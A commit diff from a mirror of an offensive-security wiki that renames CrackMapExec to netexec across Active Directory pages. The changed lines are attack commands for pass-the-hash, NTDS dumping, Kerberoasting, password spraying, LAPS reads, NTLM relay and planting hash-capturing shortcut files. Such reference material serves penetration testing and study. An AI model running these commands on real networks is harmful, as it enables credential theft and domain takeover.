swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

switch to nxc as cme is archived

pull/7/head
mpgn 2024-03-29 21:24:52 +00:00
parent 16adcd22c1
commit 2c39a69994
25 changed files with 66 additions and 66 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
docs/active-directory/CVE/MS14-068.md
View File

@ -22,7 +22,7 @@ This exploit require to know the user SID, you can use `rpcclient` to remotely g
Convert-NameToSid high-sec-corp.localkrbtgt Convert-NameToSid high-sec-corp.localkrbtgt
S-1-5-21-2941561648-383941485-1389968811-502 S-1-5-21-2941561648-383941485-1389968811-502
``` ```
* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid` * netexec: `netexec ldap DC1.lab.local -u username -p password -k --get-sid`
```bash ```bash
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068

4
docs/active-directory/CVE/NoPAC.md
View File

@ -10,12 +10,12 @@
0. Check the MachineAccountQuota of the account 0. Check the MachineAccountQuota of the account
```powershell ```powershell
crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ netexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ
StandIn.exe --object ms-DS-MachineAccountQuota=* StandIn.exe --object ms-DS-MachineAccountQuota=*
``` ```
1. Check if the DC is vulnerable 1. Check if the DC is vulnerable
```powershell ```powershell
crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac netexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac
``` ```
**Exploitation** **Exploitation**

2
docs/active-directory/CVE/PrintNightmare.md
View File

@ -48,7 +48,7 @@ When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the
WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav:
```ps1 ```ps1
cme smb -u user -p password -d domain.local -M webdav [TARGET] nxc smb -u user -p password -d domain.local -M webdav [TARGET]
``` ```
**Trigger the exploit**: **Trigger the exploit**:

4
docs/active-directory/CVE/ZeroLogon.md
View File

@ -75,9 +75,9 @@ Exploit steps from the white paper
lsadump::postzerologon /target:10.10.10.10 /account:DC01$ lsadump::postzerologon /target:10.10.10.10 /account:DC01$
``` ```
* `CrackMapExec` - only check * `netexec` - only check
```powershell ```powershell
crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon netexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
``` ```
A 2nd approach to exploit zerologon is done by relaying authentication. A 2nd approach to exploit zerologon is done by relaying authentication.

2
docs/active-directory/ad-adcs-certificate-services.md
View File

@ -5,7 +5,7 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role
## ADCS Enumeration ## ADCS Enumeration
* crackmapexec: `crackmapexec ldap domain.lab -u username -p password -M adcs` * netexec: `netexec ldap domain.lab -u username -p password -M adcs`
* ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` * ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* certutil: `certutil.exe -config - -ping`, `certutil -dump` * certutil: `certutil.exe -config - -ping`, `certutil -dump`

6
docs/active-directory/ad-adds-enumerate.md
View File

@ -282,9 +282,9 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
Sometimes you need to find a machine where a specific user is logged in. Sometimes you need to find a machine where a specific user is logged in.
You can remotely query every machines on the network to get a list of the users's sessions. You can remotely query every machines on the network to get a list of the users's sessions.
* CrackMapExec * netexec
```ps1 ```ps1
cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions nxc smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions
SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions
SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator
``` ```
@ -320,7 +320,7 @@ You can remotely query every machines on the network to get a list of the users'
## References ## References
* [Explain like Im 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) * [Explain like Im 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/) * [Pen Testing Active Directory Environments - Part I: Introduction to netexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-netexec-powerview/)
* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/) * [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/)
* [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/) * [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/)
* [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/) * [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/)

2
docs/active-directory/ad-adds-groups.md
View File

@ -9,7 +9,7 @@ If you do not want modified ACLs to be overwritten every hour, you should change
Find users with `AdminCount=1`. Find users with `AdminCount=1`.
```ps1 ```ps1
crackmapexec ldap 10.10.10.10 -u username -p password --admin-count netexec ldap 10.10.10.10 -u username -p password --admin-count
# or # or
bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get search --filter '(admincount=1)' --attr sAMAccountName bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get search --filter '(admincount=1)' --attr sAMAccountName
# or # or

4
docs/active-directory/ad-adds-linux.md
View File

@ -99,8 +99,8 @@ On macOS you can use `bifrost`.
Connect to the machine using the account and the hash with CME. Connect to the machine using the account and the hash with CME.
```powershell ```powershell
$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN" $ netexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN"
CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0
``` ```

8
docs/active-directory/ad-adds-ntds-dumping.md
View File

@ -27,8 +27,8 @@ DCSync is a technique used by attackers to obtain sensitive information, includi
```powershell ```powershell
mimikatz# lsadump::dcsync /domain:htb.local /all /csv mimikatz# lsadump::dcsync /domain:htb.local /all /csv
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi
``` ```
> :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts. > :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts.
@ -48,9 +48,9 @@ The VSS is a Windows service that allows users to create snapshots or backups of
```powershell ```powershell
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
``` ```
* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) * [netexec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit)
```powershell ```powershell
cme smb 10.10.0.202 -u username -p password --ntds vss nxc smb 10.10.0.202 -u username -p password --ntds vss
``` ```

6
docs/active-directory/ad-roasting-asrep.md
View File

@ -44,9 +44,9 @@
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
``` ```
* CrackMapExec Module * netexec Module
```powershell ```powershell
$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt
LDAP 10.0.2.11 389 dc01 $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5 LDAP 10.0.2.11 389 dc01 $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5
``` ```
@ -106,7 +106,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
```bash ```bash
user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
user@hostname:~$ crackmapexec smb DC01.DOMAIN.LOCAL -k --shares user@hostname:~$ netexec smb DC01.DOMAIN.LOCAL -k --shares
``` ```
**Mitigations**: **Mitigations**:

4
docs/active-directory/ad-roasting-kerberoasting.md
View File

@ -18,9 +18,9 @@ Any valid domain user can request a kerberos ticket (ST) for any domain service.
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2 $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2
``` ```
* CrackMapExec Module * netexec Module
```powershell ```powershell
$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt
LDAP 10.0.2.11 389 dc01 [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False) LDAP 10.0.2.11 389 dc01 [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False)
LDAP 10.0.2.11 389 dc01 $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9 LDAP 10.0.2.11 389 dc01 $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9
``` ```

4
docs/active-directory/hash-pass-the-hash.md
View File

@ -14,9 +14,9 @@ The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since
run run
shell shell
``` ```
* CrackMapExec * netexec
```powershell ```powershell
cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" nxc smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
``` ```
* Impacket suite * Impacket suite
```powershell ```powershell

8
docs/active-directory/internal-mitm-relay.md
View File

@ -83,10 +83,10 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support
impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support
# the socks proxy can then be used with your Impacket tools or CrackMapExec # the socks proxy can then be used with your Impacket tools or netexec
$ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1
$ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth
$ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" $ proxychains netexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1"
``` ```
**Mitigations**: **Mitigations**:
@ -106,7 +106,7 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
```powershell ```powershell
crackmapexec smb $hosts --gen-relay-list relay.txt netexec smb $hosts --gen-relay-list relay.txt
# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 # DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6
# -d is the domain name that we filter our request on - the attacked domain # -d is the domain name that we filter our request on - the attacked domain
@ -239,7 +239,7 @@ secretsdump.py -k -no-pass target.lab.local
* Discover WebDAV services * Discover WebDAV services
```ps1 ```ps1
webclientservicescanner 'domain.local'/'user':'password'@'machine' webclientservicescanner 'domain.local'/'user':'password'@'machine'
crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
GetWebDAVStatus.exe 'machine' GetWebDAVStatus.exe 'machine'
``` ```
* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. * Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System.

8
docs/active-directory/internal-shares.md
View File

@ -98,12 +98,12 @@ IconFile=\\10.10.10.10\Share\test.ico
Command=ToggleDesktop Command=ToggleDesktop
``` ```
Using [`crackmapexec`](https://github.com/mpgn/CrackMapExec/blob/master/cme/modules/slinky.py): Using [`netexec`](https://github.com/Pennyw0rth/NetExec/blob/master/cme/modules/slinky.py):
```ps1 ```ps1
crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf netexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP
``` ```
### URL Files ### URL Files

4
docs/active-directory/kerberos-delegation-unconstrained.md
View File

@ -41,9 +41,9 @@ Check the `TRUSTED_FOR_DELEGATION` property.
grep TRUSTED_FOR_DELEGATION domain_computers.grep grep TRUSTED_FOR_DELEGATION domain_computers.grep
``` ```
* [CrackMapExec module](https://github.com/mpgn/CrackMapExec/wiki) * [netexec module](https://github.com/Pennyw0rth/NetExec/wiki)
```powershell ```powershell
cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation nxc ldap 10.10.10.10 -u username -p password --trusted-for-delegation
``` ```
* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` * BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`

2
docs/active-directory/kerberos-tickets.md
View File

@ -25,7 +25,7 @@ There are two types of tickets in Kerberos:
## Replay Kerberos Tickets ## Replay Kerberos Tickets
* Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\TGT_Administrator@lab.local.ccache"` * Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\TGT_Administrator@lab.local.ccache"`
* CrackMapExec: `KRB5CCNAME=/tmp/administrator.ccache crackmapexec smb 10.10.10 -u user --use-kcache` * netexec: `KRB5CCNAME=/tmp/administrator.ccache netexec smb 10.10.10 -u user --use-kcache`
## Convert Kerberos Tickets ## Convert Kerberos Tickets

4
docs/active-directory/pwd-comments.md
View File

@ -9,8 +9,8 @@ There are 3-4 fields that seem to be common in most Active Directory schemas: `U
* Password in User Description * Password in User Description
```powershell ```powershell
crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc netexec ldap domain.lab -u 'username' -p 'password' -M user-desc
crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users
GET-DESC... 10.0.2.11 389 dc01 [+] Found following users: GET-DESC... 10.0.2.11 389 dc01 [+] Found following users:
GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account

6
docs/active-directory/pwd-group-policy-preferences.md
View File

@ -27,10 +27,10 @@ echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aS
post/windows/gather/credentials/gpp post/windows/gather/credentials/gpp
``` ```
* CrackMapExec modules * netexec modules
```powershell ```powershell
cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin
cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password
``` ```
* [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py) * [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py)

6
docs/active-directory/pwd-read-gmsa.md
View File

@ -15,11 +15,11 @@
### Extract NT hash from the Active Directory ### Extract NT hash from the Active Directory
* [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec) * [mpgn/netexec](https://github.com/Pennyw0rth/NetExec)
```ps1 ```ps1
# Use --lsa to get GMSA ID # Use --lsa to get GMSA ID
crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99 netexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99
crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....' netexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....'
``` ```
* [CravateRouge/bloodyAD](https://github.com/CravateRouge/bloodyAD) * [CravateRouge/bloodyAD](https://github.com/CravateRouge/bloodyAD)

4
docs/active-directory/pwd-read-laps.md
View File

@ -61,9 +61,9 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1
``` ```
* [CrackMapExec](https://github.com/mpgn/CrackMapExec): * [netexec](https://github.com/Pennyw0rth/NetExec):
```bash ```bash
crackmapexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps netexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
``` ```
* [LAPSDumper](https://github.com/n00py/LAPSDumper) * [LAPSDumper](https://github.com/n00py/LAPSDumper)

6
docs/active-directory/pwd-spraying.md
View File

@ -38,9 +38,9 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
## Spray a pre-generated passwords list ## Spray a pre-generated passwords list
* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. * Using `netexec` and `mp64` to generate passwords and spray them against SMB services on the network.
```powershell ```powershell
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` netexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
``` ```
* Using `DomainPasswordSpray` to spray a password against all users of a domain. * Using `DomainPasswordSpray` to spray a password against all users of a domain.
```powershell ```powershell
@ -74,7 +74,7 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
> The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. > The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown.
```powershell ```powershell
$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never> LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never> LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
``` ```

4
docs/active-directory/trust-relationship.md
View File

@ -24,9 +24,9 @@
---------- ---------- --------- -------------- ---------- ---------- --------- --------------
domainA.local domainB.local TreeRoot Bidirectional domainA.local domainB.local TreeRoot Bidirectional
``` ```
* Crackmapexec module `enum_trusts` * netexec module `enum_trusts`
```powershell ```powershell
cme ldap <ip> -u <user> -p <pass> -M enum_trusts nxc ldap <ip> -u <user> -p <pass> -M enum_trusts
``` ```

2
docs/cheatsheets/miscellaneous-tricks.md
View File

@ -16,7 +16,7 @@ $ who
$ write root pts/2 # press Ctrl+D after typing the message. $ write root pts/2 # press Ctrl+D after typing the message.
``` ```
## CrackMapExec Credential Database ## netexec Credential Database
```ps1 ```ps1
cmedb (default) > workspace create test cmedb (default) > workspace create test

28
docs/redteam/access/windows-using-credentials.md
View File

@ -7,7 +7,7 @@
* [Guest Credential](#guest-credential) * [Guest Credential](#guest-credential)
* [Retail Credential](#retail-credential) * [Retail Credential](#retail-credential)
* [Sandbox Credential](#sandbox-credential) * [Sandbox Credential](#sandbox-credential)
* [Crackmapexec](#crackmapexec) * [netexec](#netexec)
* [Impacket](#impacket) * [Impacket](#impacket)
* [PSExec](#psexec) * [PSExec](#psexec)
* [WMIExec](#wmiexec) * [WMIExec](#wmiexec)
@ -94,23 +94,23 @@ Username: wdagutilityaccount
Password: pw123 Password: pw123
``` ```
## Crackmapexec ## netexec
Using [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec) Using [mpgn/netexec](https://github.com/Pennyw0rth/NetExec)
* CrackMapExec supports many protocols * netexec supports many protocols
```powershell ```powershell
crackmapexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" netexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
crackmapexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" netexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
crackmapexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" netexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
crackmapexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" netexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
``` ```
* CrackMapExec works with password, NT hash and Kerberos authentication * netexec works with password, NT hash and Kerberos authentication
```powershell ```powershell
crackmapexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password netexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password
crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash
export KRB5CCNAME=/tmp/kerberos/admin.ccache; crackmapexec smb 192.168.1.100 -u admin --use-kcache # Kerberos export KRB5CCNAME=/tmp/kerberos/admin.ccache; netexec smb 192.168.1.100 -u admin --use-kcache # Kerberos
``` ```
@ -228,7 +228,7 @@ PS C:\> netsh firewall set service remoteadmin enable
PS C:\> netsh firewall set service remotedesktop enable PS C:\> netsh firewall set service remotedesktop enable
# Alternative # Alternative
C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable root@payload$ netexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
# Fix CredSSP errors # Fix CredSSP errors
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

2
docs/redteam/escalation/windows-privilege-escalation.md
View File

@ -1446,7 +1446,7 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
### MS17-010 (Eternal Blue) ### MS17-010 (Eternal Blue)
Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. Check the vulnerability with the following nmap script or netexec: `netexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`.
```c ```c
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17010 <ip_netblock> nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17010 <ip_netblock>